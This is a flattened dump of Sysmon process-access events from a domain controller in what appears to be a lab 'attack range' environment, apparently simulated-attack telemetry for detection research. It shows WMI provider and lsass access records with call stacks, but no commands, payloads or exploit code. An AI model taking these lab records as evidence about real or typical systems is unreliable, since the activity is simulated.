15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 11241100x800000000000000022674Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5351-6008-2606-00000000A301}6088C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_ufekcmfa.kms.ps12021-01-20 15:59:14.007 10341000x800000000000000022673Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022672Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022671Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022670Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022669Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022668Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022667Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022666Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022665Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022664Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022663Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022662Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022661Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022660Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-4985-6008-0B00-00000000A301}856896C:\Windows\system32\lsass.exe{7901BC46-5351-6008-2806-00000000A301}832C:\Windows\System32\mshta.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000022659Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022658Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022657Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022656Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:14.007{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022655Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:13.992{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7E00-00000000A301}4316C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000022654Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 